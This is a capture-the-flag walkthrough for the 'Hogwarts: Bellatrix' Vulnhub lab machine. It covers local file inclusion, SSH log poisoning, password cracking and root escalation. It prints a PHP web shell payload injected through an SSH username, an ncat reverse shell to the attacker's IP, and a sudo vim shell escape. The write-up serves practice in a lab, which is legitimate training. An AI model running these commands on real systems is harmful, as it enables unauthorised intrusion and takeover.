Hogwarts: Bellatrix Vulnhub (Writeup)

Difficulty: Pure Intermediate

#NMAP:

-sC : Default Script

-sV : Version Scan

-A : Aggressive Scan

-p- : Scan all ports TCP/UDP

-oN : Output of text

Navigate on the IP

we have the first hint in the source page, so let’s add it as a directory

Add ikilledsiriusblack.php and let’s review the source page and find a valid parameter to add.

#LFI (Local File Inclusion):

Ok now I didn’t really know what to do, the information was too little, so I found on google an interesting directory /var/log/auth.log where it is possible to ssh-log- poisoning.

#SSH-LOG-POISONING:

RCE with LFI and SSH Log Poisoning

I release this article that I found, it could be very useful. So navigate on /var/log/auth.log

Ok now is possible you can ssh log poisoning, you can follow the article or do your own thing. I found a really good command.

ssh ‘<?php echo shell_exec($_GET[“jin”]);?>’@192.168.1.133

Add the parameter “jin” and let’s see if it works. Remember while running the command do CTRL + C and go to the URL

Now with the “jin” parameter we can write and check if ssh-log-poisoning really worked, you can write whatever you want, for example “id”, “ls -la”, “whoami”
etc..

ok it looks like the “jin” parameter worked. Remeber add &jin=

Ok it works now! The time has come to load our malicious payload, I have tried various payloads that I have found on the web, but none seem to work, in the end after hours of trying, I have found the right payload.

ncat -e /bin/bash 192.168.1.115 1234 (add this in url)

it’s time to launch it, remember make sure you are listening on the given door.

nc- lnvp 1234

And we are INNNN!!!!!

Now enumerate www-data

#Enumeration:

I found this file and it appears to be base 64 let’s decrypt it.

Wow we have found secrets, but what is this? A password? to directory? No it was a rabbit hole, that encode was just the directory itself, let’s browse.

Ok inside the secret directory we find 2 files, the first “.dic” seem to be passwords !! While the second file appears to be a hash.

Copy all passwords and put them inside a file.

Here we find the hash instead. I used john to crack the password. But you could use hashcat with -m 1800. (sha512crypt) Remember to use the wordlist found.

YESSSS We have the password for “lestrange”. For convenience we log in with

ssh lestrange@IP and the password found on another shell.

#Horizontal Privilege Escalation:

First thing I did is see if there is any vulnerability in sudo.

Ok we can use vim to become root, in this case use this link, it might be useful:

https://gtfobins.github.io/

And we are ROOT!!! Command: sudo /usr/bin/vim -c ‘:!/bin/sh’

I hope I have been useful to you. Good luck guys.